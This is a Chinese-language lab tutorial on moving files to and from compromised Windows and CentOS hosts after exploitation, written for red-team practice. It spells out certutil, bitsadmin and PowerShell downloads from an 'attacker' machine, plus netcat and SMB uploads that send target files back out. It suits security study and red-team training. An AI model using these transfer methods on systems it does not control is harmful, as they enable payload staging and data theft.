后渗透:文件传输指南

2025-01-25 8 0

在红蓝对抗过程中,文件传输是后渗透场景中的关键步骤。文件传输有多种方法,在本文中我们将逐一介绍。

目录

  • 实验环境配置

  • 使用wget进行文件传输

  • 使用curl进行文件传输

  • 使用certutil进行文件传输

  • 使用bitsadmin进行文件传输

  • 使用PowerShell进行文件传输

  • 使用SMB服务器进行文件传输

  • 使用SCP进行文件传输

  • 使用TFTP进行文件传输

  • 使用FTP传输文件

  • 设置文件传输服务器的不同方法

  • 使用Netcat进行文件传输

  • 结论

实验环境配置

在这里,我们进行行文件传输,假设我们已经拿到了目标机器,且我们拥有初始 shell 访问权限。

  • 攻击者机器:Kali Linux(192.168.202.130)

  • 目标机器1:Windows 10(192.168.202.128)

  • 目标机器 2:Centos(192.168.202.129)

在攻击者的机器Kali 中,我们将设置一个updog服务器。它是 Python 的SimpleHTTPServer的替代品。它对于需要轻量级、快速部署的 HTTP 服务器的场景很有用。

要安装服务器,我们将执行以下命令:

pip3 install updog

安装完成后,我们可以使用以下命令在80端口运行服务器:

updog -p 80

使用wget进行文件传输

要传输文件,我们可以使用wget命令。wget是一个强大的命令,可以从网络下载文件。需要注意的是,在 Windows 中使用 wget 进行文件传输时,我们需要提及-o( -OutFile) 参数才能保存文件。如果不使用参数-o,则只会将其作为对象(即WebResponseObject)返回。Windows 中wget的命令是:

powershell wget http://192.168.202.130/safefox.txt -o safefox.txt
dir
type safefox.txt

使用Curl进行文件传输

Curl 是一个强大的命令行工具,可用于使用各种网络协议传输文件。以下是传输文件的命令:

curl http://192.168.202.130/safefox.txt -o safefox.txt

使用certutil进行文件传输

certutil是 Windows 操作系统附带的命令行实用程序,用于管理证书和加密元素。要使用certutil传输文件,可以使用以下命令:

certutil -urlcache -f http://192.168.202.130/safefox.txt safefox.txt

certutil中的-split选项用于将大文件分割成较小的段以执行文件传输。

certutil -urlcache -split -f http://192.168.202.130/safefox.txt safefox.txt

使用Bitsadmin进行文件传输

Bitsadmin是一个命令行实用程序,用于处理 Windows 中的后台智能传输服务 (BITS) 任务。它有助于执行不同的文件传输操作,包括下载和上传文件。文件传输的命令是:

bitsadmin /transfer job http://192.168.202.130/safefox.txt C:\Users\Public\safefox.txt

执行命令后可见文件传输成功。

使用 PowerShell 进行文件传输

可以通过运行以下命令直接使用PowerShell执行文件传输:

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.202.130/safefox.txt', 'safefox.txt')

使用 SMB 服务器进行文件传输

SMB 是一种用于通信的协议,用于在网络内提供对文件、端口等的共享访问。为了启用它,我们将使用kali linux 中的impacket-smbserver脚本来共享文件。这里我们将共享目录名称指定为share,这里 share 的意义在于它将文件的长路径转换为单个共享目录。在这里,我们可以将目录的完整路径或pwd作为参数,以便它采用当前目录路径。

impacket-smbserver share $(pwd) -smb2support

设置完成后,我们可以在Windows机器上执行以下命令从共享文件夹复制文件。

copy \\192.168.202.130\share\safefox.txt
copy safefox.txt \\192.168.202.130\share\safefox.txt

为了从另一台 Linux 机器(如 Centos)传输文件,我们可以使用smbclient工具连接共享文件夹,在登录后,我们可以分别使用 put 和 get 命令直接上传和下载文件。

smbclient -L 192.168.202.130
smbclient "\\\\192.168.202.130\share"
ls
get safefox.txt
put data.txt

使用 SCP 进行文件传输

SCP(安全复制协议)是一种在本地系统和远程服务器之间或两个远程服务器之间安全传输文件的方法。它通过SSH(Secure Shell)协议运行,该协议可确保在可能不安全的网络上建立安全连接。它具有跨平台使用的优势,因此 Linux 和 Windows 都支持它。

要将文件从 Windows 复制到 kali,我们将使用以下命令:

scp safefox.txt [email protected]:/tmp

要将文件从 kali linux 传输到 windows 机器,我们将使用以下命令:

scp safefox.txt [email protected]:/C:/Temp

使用 TFTP 进行文件传输

TFTP(简单文件传输协议)是一种基本的、简单的网络文件传输协议。它通过 UDP 而不是 TCP 运行,这种选择有助于保持协议的轻量性,但意味着它不提供 TCP 提供的可靠性和错误检查。它在 UDP 端口69上运行。

要将文件从 kali linux 传输到 windows 机器,我们将在Metasploit框架内使用以下命令:

msfconsole
use auxiliary/server/tftp
set srvhost 192.168.202.130
set tftproot /root/raj
run

要下载文件,我们将在 Windows 机器上运行以下命令:

tftp -i 192.168.202.130 GET safefox.txt

使用 FTP 进行文件传输

FTP(文件传输协议)是一种历史悠久且广泛使用的协议,用于通过网络传输文件。它使用户能够上传、下载和管理远程服务器上的文件。要启用 FTP 服务,我们将使用Metasploit框架。需要注意的是,我们在这里保留对服务的身份验证,而不是保留匿名登录。

以下是命令:

use auxiliary/server/ftp
set srvhost 192.168.202.130
set ftproot /root/test
set ftpuser safefox
set ftppass 123
run

服务器启动后,登录FTP服务器验证后即可下载文件。

ftp 192.168.202.130
dir
get safefox.txt

我们还可以使用pyftpdlib来使用 python FTP 服务器。它是一个 python 库,可以帮助我们在机器上设置 FTP 服务器。在这里我们将使用它在 kali 机器上设置 FTP 服务器。

首先,我们将使用 pip3 开始安装。

pip3 install pyftpdlib

安装完成后,我们可以通过以下命令使用身份验证启动FTP服务器:

python3 -m pyftpdlib -w -p 21 -u ignite -P 123

服务器启动后,我们可以从 Windows 计算机验证 FTP 服务器的身份并下载文件。要上传文件,我们将使用put命令;要下载文件,我们将使用get命令。

ftp 192.168.202.130
get kali_data.txt
put data_ftp.txt

要设置用于匿名登录的 FTP 服务器,我们将运行相同的命令,但不需要用户名和密码。

python3 -m pyftpdlib -w -p 21

一旦服务器启用匿名登录,我们就可以执行它并查看文件。

ftp 192.168.202.130
ls

设置文件传输服务器的不同方法

为了执行文件传输,除了使用updog之外,我们还需要设置一个服务器。

要使用PHP设置服务器,我们可以使用以下命令:

php -S 0.0.0.0:8081

后渗透:文件传输指南插图

要使用python2设置服务器,我们可以使用以下命令:

python2 -m SimpleHTTPServer 80

后渗透:文件传输指南插图1

要使用python3设置服务器,我们可以使用以下命令:

python3 -m http.server 8000

后渗透:文件传输指南插图2

使用 Netcat 进行文件传输

Netcat,通常称为nc,是一种多功能网络工具,旨在通过 TCP 或 UDP 读取和写入网络连接。Netcat 可以通过建立简单的客户端-服务器设置来促进文件传输。

要从 Centos机器传输 kali 机器中的文件,我们可以在 kali 中使用以下命令:

nc -lvp 5555 > file.txt

后渗透:文件传输指南插图3

现在我们可以在Centos中运行以下命令将文件发送到kali机器:

ls
nc 192.168.202.130 5555 < file.txt

后渗透:文件传输指南插图4

后渗透:文件传输指南插图5

类似地,我们也可以在 kali linux 中从 windows 机器接收文件。但是,需要注意的是,目标 windows 机器应该有 nc.exe 二进制文件才能使此方法有效。

以下是我们需要在 Windows 机器上运行的命令:

nc.exe 192.168.202.130 5555 < data.txt

后渗透:文件传输指南插图6

为了在 kali 机器中接收文件,我们将运行以下命令:

nc -lvp 5555 > data.txt
cat data.txt

后渗透:文件传输指南插图7

结论

通过实验,我们已经看到,有多种方法可以将文件从我们的机器传输到目标系统,反之亦然。使用适当的工具进行文件传输取决于个人选择和现实情况。


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

hackmyvm——Family
json组件下的原生反序列化getter触发
【Abyss】Android平台BPF和SECCOMP的SVC指令拦截
黑客用假恶意软件生成器感染1.8万名“脚本小子”
黑客利用Windows RID劫持技术创建隐藏管理员账户
渗透测试中的CORS漏洞利用

发布评论